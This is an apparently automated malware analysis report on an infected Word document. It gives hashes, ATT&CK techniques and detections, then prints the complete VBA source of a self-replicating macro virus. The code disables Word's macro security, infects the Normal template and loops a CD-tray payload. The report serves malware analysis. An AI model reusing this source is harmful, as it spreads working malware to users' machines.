Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5310680e4f6b8f22…

MALICIOUS

Office (OLE)

Size: 31.0 KB  Created: 2002-03-26 21:04:00  Authoring application: Microsoft Word 10.0  First seen: 2012-06-14
MD5: be5fc5660d9d622ad75c8984b508e4a8  SHA-1: 6097ac50871fd35a2ca4ee10d3a1608497973b30  SHA-256: 5310680e4f6b8f2293070b6e37b408d4d6fcb79fe62ccf150c91b2a35320191b
Risk Score: 180

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a critical indicator of malicious intent. The script attempts to lower macro security settings and inject code into the document and Normal.dot template, suggesting an attempt at persistence. The ClamAV detections 'Win.Trojan.Kallisti-1' and 'Doc.Trojan.Assilem-1' further confirm its malicious nature, likely indicating a trojan downloader or dropper.

Heuristics (3)

  • ClamAV: Win.Trojan.Kallisti-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Kallisti-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    A Document_Open macro runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3205 bytes
SHA-256: 3c063f7fdbef1819bd8c97812cdfe7bacc29e9ca6806c5a253e99ff243ed7011
Detection: ClamAV: Doc.Trojan.Assilem-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
WMXP.DrDope
Attribute VB_Name = "DrDope"

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub Document_Open()
On Error Resume Next
'VirusName: Doctor Dope
'coded by Necronomikon
'Info: Written for a friend of mine!We all call him Doctor Dope(Steve)!?;)
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
'--- cut here ---
'this code is taken from XP.Kallisti by jackie/lz0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
'--- cut here ---
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NT1 = NT.CodeModule.CountOfLines
AD1 = AD.CodeModule.CountOfLines
Nec = 2
If AD.Name <> "ddope" Then
If AD1 > 0 Then _
AD.CodeModule.DeleteLines 1, AD1
Set ToInfect = AD
AD.Name = "ddope"
DoAD = True
End If
If NT.Name <> "ddope" Then
If NT1 > 0 Then _
NT.CodeModule.DeleteLines 1, NT1
Set ToInfect = NT
NT.Name = "ddope"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo bye
If DoNT = True Then
Do While AD.CodeModule.Lines(1, 1) = ""
AD.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While AD.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, AD.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
End If
If DoAD = True Then
Do While NT.CodeModule.Lines(1, 1) = ""
NT.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NT.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, NT.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
bye:
If NT1 <> 0 And AD1 = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
Call Payload
End Sub
Private Sub Payload()
On Error Resume Next
'Thanks WalruS for code!;)
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub